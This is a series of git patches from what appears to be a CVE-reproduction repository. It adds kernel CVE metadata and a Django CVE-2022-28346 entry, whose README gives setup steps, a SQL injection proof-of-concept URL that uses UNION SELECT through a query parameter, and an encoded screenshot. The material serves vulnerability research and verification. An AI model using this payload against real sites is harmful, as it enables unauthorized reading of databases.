scope-of-influence: + 4.15.x <= Linux kernel < 4.19.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-18955 + - https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2 + cvss-metrics: CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.0 + cve-id: CVE-2018-18955 + cwe-id: CWE-863 + cnvd-id: None + kve-id: None + tags: RCE, 提权 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7128c8a6..7b3e758e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -71,6 +71,7 @@ cve: - CVE-2019-13272 - CVE-2020-12351 - CVE-2021-43267 + - CVE-2018-18955 sudo: - CVE-2019-18634 - CVE-2021-3156 From 75a118f84e219f26c98d354a3a08970163d8761d Mon Sep 17 00:00:00 2001 
From: guanzhenyu Date: Fri, 7 Apr 2023 18:13:22 +0800 Subject: [PATCH 011/109] Move CVE-2018-18955 from openkylin_list.yaml to other_list.yaml --- openkylin_list.yaml | 1 - other_list.yaml | 1 + 2 files changed, 1 insertion(+), 1 deletion(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7b3e758e..7128c8a6 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -71,7 +71,6 @@ cve: - CVE-2019-13272 - CVE-2020-12351 - CVE-2021-43267 - - CVE-2018-18955 sudo: - CVE-2019-18634 - CVE-2021-3156 diff --git a/other_list.yaml b/other_list.yaml index e96035e2..d3ae8268 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -12,6 +12,7 @@ cve: - CVE-2021-33624 - CVE-2020-27194 - CVE-2023-0179 + - CVE-2018-18955 polkit: - CVE-2021-3560 Outlook: From cffa0aceaa960cc65af18494fb573a5631270f2c Mon Sep 17 00:00:00 2001 From: zeroc Date: Fri, 7 Apr 2023 17:13:43 +0800 Subject: [PATCH 012/109] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-28346?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .gitmodules | 3 +++ cve/django/2022/CVE-2022-28346/POC_env | 1 + cve/django/2022/CVE-2022-28346/README.md | 20 ++++++++++++++++ .../image-20220426224053969.png | Bin 0 -> 47163 bytes cve/django/2022/yaml/CVE-2022-28346.yaml | 22 ++++++++++++++++++ 5 files changed, 46 insertions(+) create mode 160000 cve/django/2022/CVE-2022-28346/POC_env create mode 100644 cve/django/2022/CVE-2022-28346/README.md create mode 100644 cve/django/2022/CVE-2022-28346/image-20220426224053969.png create mode 100644 cve/django/2022/yaml/CVE-2022-28346.yaml diff --git a/.gitmodules b/.gitmodules index dc54b713..389186c0 100644 --- a/.gitmodules +++ b/.gitmodules @@ -2,3 +2,6 @@ url = https://gitee.com/zhangqichen131/cve-2022-22978-poc-environment path = cve/java-spring-security/2022/CVE-2022-22978/POC_environment +[submodule "cve/django/2022/CVE-2022-28346/POC_env"] + path = cve/django/2022/CVE-2022-28346/POC_env + url = https://github.com/DeEpinGh0st/CVE-2022-28346 
diff --git a/cve/django/2022/CVE-2022-28346/POC_env b/cve/django/2022/CVE-2022-28346/POC_env new file mode 160000 index 00000000..5a28f5e3 --- /dev/null +++ b/cve/django/2022/CVE-2022-28346/POC_env @@ -0,0 +1 @@ +Subproject commit 5a28f5e3fa893ea64e81488ef736665d17908499 diff --git a/cve/django/2022/CVE-2022-28346/README.md b/cve/django/2022/CVE-2022-28346/README.md new file mode 100644 index 00000000..d4390216 --- /dev/null +++ b/cve/django/2022/CVE-2022-28346/README.md @@ -0,0 +1,20 @@ +### CVE-2022-28346 +Django QuerySet.annotate(), aggregate(), extra() SQL 注入 + +### 环境初始化 +``` +1.python manage.py makemigrations +2.python manage.py migrate +3.访问http://x.x.x.x:8000/ 插入初始化数据 +``` + +### 漏洞复现 + +``` +访问http://x.x.x.x:8000/demo +POC: http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" -- +``` + +![image-20220426224053969](./image-20220426224053969.png) + +**验证漏洞存在** \ No newline at end of file 
diff --git a/cve/django/2022/CVE-2022-28346/image-20220426224053969.png b/cve/django/2022/CVE-2022-28346/image-20220426224053969.png new file mode 100644 index 0000000000000000000000000000000000000000..14bc949d3bed1b5cf28f4b7e973e7f73df6c608f GIT binary patch literal 47163 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 